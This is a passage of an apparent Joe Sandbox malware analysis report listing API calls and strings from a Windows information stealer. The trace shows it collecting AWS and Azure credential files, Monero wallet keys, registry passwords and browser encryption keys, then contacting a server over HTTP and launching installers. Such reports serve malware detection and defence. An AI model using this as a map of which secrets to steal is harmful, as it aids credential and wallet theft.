                              • lstrcat.KERNEL32(?,00000000), ref: 00134E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00134E59
                                • Part of subcall function 00134910: StrCmpCA.SHLWAPI(?,00140FDC), ref: 00134971
                                • Part of subcall function 00134910: StrCmpCA.SHLWAPI(?,00140FE0), ref: 00134987
                                • Part of subcall function 00134910: FindNextFileA.KERNEL32(000000FF,?), ref: 00134B7D
                                • Part of subcall function 00134910: FindClose.KERNEL32(000000FF), ref: 00134B92
                              • lstrcat.KERNEL32(?,00000000), ref: 00134EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00134EE5
                                • Part of subcall function 00134910: wsprintfA.USER32 ref: 001349B0
                                • Part of subcall function 00134910: StrCmpCA.SHLWAPI(?,001408D2), ref: 001349C5
                                • Part of subcall function 00134910: wsprintfA.USER32 ref: 001349E2
                                • Part of subcall function 00134910: PathMatchSpecA.SHLWAPI(?,?), ref: 00134A1E
                                • Part of subcall function 00134910: lstrcat.KERNEL32(?,00FFE868), ref: 00134A4A
                                • Part of subcall function 00134910: lstrcat.KERNEL32(?,00140FF8), ref: 00134A5C
                                • Part of subcall function 00134910: lstrcat.KERNEL32(?,?), ref: 00134A70
                                • Part of subcall function 00134910: lstrcat.KERNEL32(?,00140FFC), ref: 00134A82
                                • Part of subcall function 00134910: lstrcat.KERNEL32(?,?), ref: 00134A96
                                • Part of subcall function 00134910: CopyFileA.KERNEL32(?,?,00000001), ref: 00134AAC
                                • Part of subcall function 00134910: DeleteFileA.KERNEL32(?), ref: 00134B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: b7aff281511ef767900da30062ee049d1446a011c76ce7454afbf98c57c47534
                              • Instruction ID: a170f70e61b3af4a3f9500c36135c1f2c83874b342e43ab0b83c429343d75912
                              • Opcode Fuzzy Hash: b7aff281511ef767900da30062ee049d1446a011c76ce7454afbf98c57c47534
                              • Instruction Fuzzy Hash: C2415EBA94021877DB10E760EC47FED7638AB64705F404494B689670C1EFB5ABC98B92
                              Function 00139010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                              Download Yara Rule
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0013906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: 892acca172d047672027b8bf57c8687093021fa8ef39fbc4234394209d5a157e
                              • Instruction ID: 13f6a21c044cfa3b440a498bbae8310b8a7aefe1cddacb8c5fc895cdcfa2cd26
                              • Opcode Fuzzy Hash: 892acca172d047672027b8bf57c8687093021fa8ef39fbc4234394209d5a157e
                              • Instruction Fuzzy Hash: 7171B9B5910608ABDB04EBE4DD89FEEBBBDBF58700F108508F516A7290DB74A905CF61
                              Function 00132E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001331C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 0013335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001334EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 432280aca50fd5500dc815ca9d4b5f4f1c20cf145e2b050270d8b780bc9c5445
                              • Instruction ID: 3f35fb74d10c0c8d3918694629b5059df213c85233108eff23360af54a110ac9
                              • Opcode Fuzzy Hash: 432280aca50fd5500dc815ca9d4b5f4f1c20cf145e2b050270d8b780bc9c5445
                              • Instruction Fuzzy Hash: 9C121371850108AADB19FBA0DC92FEDB778AF24301F904199F54776191EF742B4ACFA2
                              Function 001352C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                                • Part of subcall function 00126280: InternetOpenA.WININET(00140DFE,00000001,00000000,00000000,00000000), ref: 001262E1
                                • Part of subcall function 00126280: StrCmpCA.SHLWAPI(?,00FFE7D8), ref: 00126303
                                • Part of subcall function 00126280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00126335
                                • Part of subcall function 00126280: HttpOpenRequestA.WININET(00000000,GET,?,00FFE338,00000000,00000000,00400100,00000000), ref: 00126385
                                • Part of subcall function 00126280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001263BF
                                • Part of subcall function 00126280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001263D1
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00135318
                              • lstrlen.KERNEL32(00000000), ref: 0013532F
                                • Part of subcall function 00138E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00138E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00135364
                              • lstrlen.KERNEL32(00000000), ref: 00135383
                              • lstrlen.KERNEL32(00000000), ref: 001353AE
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: a9e91660e016a63701fad18b67f27f12f44f7d0c9413271f26df06ab513eb6e7
                              • Instruction ID: 637043151c5a8c33d39e444134803f063b43894a9964485b1db52e6b86fd77b3
                              • Opcode Fuzzy Hash: a9e91660e016a63701fad18b67f27f12f44f7d0c9413271f26df06ab513eb6e7
                              • Instruction Fuzzy Hash: A3510F70910148EBDB18FF60DD96AED7779AF20301F904068F446AB592EF346B46DBA2
                              Function 001312D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 004c91f5657803e5f0111111125ddb86ac7490bb69cba08bc29b74f813a7e255
                              • Instruction ID: 8a04c54d0eb63e25b77f526621672f2433e5ee8eaed746898ea52aa42f6a8a36
                              • Opcode Fuzzy Hash: 004c91f5657803e5f0111111125ddb86ac7490bb69cba08bc29b74f813a7e255
                              • Instruction Fuzzy Hash: CCC194B594021DABCB14EF60DC99FEA7378BF64304F1045D8F50AA7281EB70AA85DF91
                              Function 00134280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00138DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00138E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 001342EC
                              • lstrcat.KERNEL32(?,00FFDEA0), ref: 0013430B
                              • lstrcat.KERNEL32(?,?), ref: 0013431F
                              • lstrcat.KERNEL32(?,00FFD3C8), ref: 00134333
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 00138D90: GetFileAttributesA.KERNEL32(00000000,?,00121B54,?,?,0014564C,?,?,00140E1F), ref: 00138D9F
                                • Part of subcall function 00129CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00129D39
                                • Part of subcall function 001299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001299EC
                                • Part of subcall function 001299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00129A11
                                • Part of subcall function 001299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00129A31
                                • Part of subcall function 001299C0: ReadFile.KERNEL32(000000FF,?,00000000,0012148F,00000000), ref: 00129A5A
                                • Part of subcall function 001299C0: LocalFree.KERNEL32(0012148F), ref: 00129A90
                                • Part of subcall function 001299C0: CloseHandle.KERNEL32(000000FF), ref: 00129A9A
                                • Part of subcall function 001393C0: GlobalAlloc.KERNEL32(00000000,001343DD,001343DD), ref: 001393D3
                              • StrStrA.SHLWAPI(?,00FFE0C8), ref: 001343F3
                              • GlobalFree.KERNEL32(?), ref: 00134512
                                • Part of subcall function 00129AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00124EEE,00000000,00000000), ref: 00129AEF
                                • Part of subcall function 00129AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00124EEE,00000000,?), ref: 00129B01
                                • Part of subcall function 00129AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00124EEE,00000000,00000000), ref: 00129B2A
                                • Part of subcall function 00129AC0: LocalFree.KERNEL32(?,?,?,?,00124EEE,00000000,?), ref: 00129B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 001344A3
                              • StrCmpCA.SHLWAPI(?,001408D1), ref: 001344C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 001344D2
                              • lstrcat.KERNEL32(00000000,?), ref: 001344E5
                              • lstrcat.KERNEL32(00000000,00140FB8), ref: 001344F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: e000a48c117d63e07e7df58269cdb64fab0dace77f003b805f7078bfa8e8db35
                              • Instruction ID: 6a4dba339893330887829d1656ed37dcffdfc684f7c4c7fe86dd0577581a0165
                              • Opcode Fuzzy Hash: e000a48c117d63e07e7df58269cdb64fab0dace77f003b805f7078bfa8e8db35
                              • Instruction Fuzzy Hash: 8A7167B6900218ABCB14EBA0DC85FEE777DAF98300F008598F605A7181DB75EB55CF91
                              Function 00121310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001212A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001212B4
                                • Part of subcall function 001212A0: RtlAllocateHeap.NTDLL(00000000), ref: 001212BB
                                • Part of subcall function 001212A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001212D7
                                • Part of subcall function 001212A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001212F5
                                • Part of subcall function 001212A0: RegCloseKey.ADVAPI32(?), ref: 001212FF
                              • lstrcat.KERNEL32(?,00000000), ref: 0012134F
                              • lstrlen.KERNEL32(?), ref: 0012135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00121377
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                                • Part of subcall function 00138B60: GetSystemTime.KERNEL32(00140E1A,00FFA990,001405AE,?,?,001213F9,?,0000001A,00140E1A,00000000,?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 00138B86
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00121465
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                                • Part of subcall function 001299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001299EC
                                • Part of subcall function 001299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00129A11
                                • Part of subcall function 001299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00129A31
                                • Part of subcall function 001299C0: ReadFile.KERNEL32(000000FF,?,00000000,0012148F,00000000), ref: 00129A5A
                                • Part of subcall function 001299C0: LocalFree.KERNEL32(0012148F), ref: 00129A90
                                • Part of subcall function 001299C0: CloseHandle.KERNEL32(000000FF), ref: 00129A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 001214EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: eb4c93b98624ea71bbd5c9f80c581ae6c81fe52072c03e0ee77d765a6e853d98
                              • Instruction ID: f8d9c40368e83098f8cd6615f74a0238dfecc341fc23514d8c5d71352fc324cd
                              • Opcode Fuzzy Hash: eb4c93b98624ea71bbd5c9f80c581ae6c81fe52072c03e0ee77d765a6e853d98
                              • Instruction Fuzzy Hash: E55122B195011867CB15EB60DD92BED737CAF64300F8041D8B64A72091EF706B89CFA6
                              Function 001275D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001272D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0012733A
                                • Part of subcall function 001272D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001273B1
                                • Part of subcall function 001272D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0012740D
                                • Part of subcall function 001272D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00127452
                                • Part of subcall function 001272D0: HeapFree.KERNEL32(00000000), ref: 00127459
                              • lstrcat.KERNEL32(00000000,001417FC), ref: 00127606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00127648
                              • lstrcat.KERNEL32(00000000, : ), ref: 0012765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0012768F
                              • lstrcat.KERNEL32(00000000,00141804), ref: 001276A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 001276D3
                              • lstrcat.KERNEL32(00000000,00141808), ref: 001276ED
                              • task.LIBCPMTD ref: 001276FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: 97d0bdc029f1aae94bb6fe99f951e514ffac7fd82b3b253ef4cf9e0be93414ea
                              • Instruction ID: a37ef172245dbef9fe750a4b61c4a84c41669a019dbe8005da40fcbf85f3c68a
                              • Opcode Fuzzy Hash: 97d0bdc029f1aae94bb6fe99f951e514ffac7fd82b3b253ef4cf9e0be93414ea
                              • Instruction Fuzzy Hash: 01314D71901519EFCB05EBA4EC99DEF7778AB54302F148118F102B72A0DB74A956CF52
                              Function 00138100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00FFE5C0,00000000,?,00140E2C,00000000,?,00000000), ref: 00138130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00138137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00138158
                              • __aulldiv.LIBCMT ref: 00138172
                              • __aulldiv.LIBCMT ref: 00138180
                              • wsprintfA.USER32 ref: 001381AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
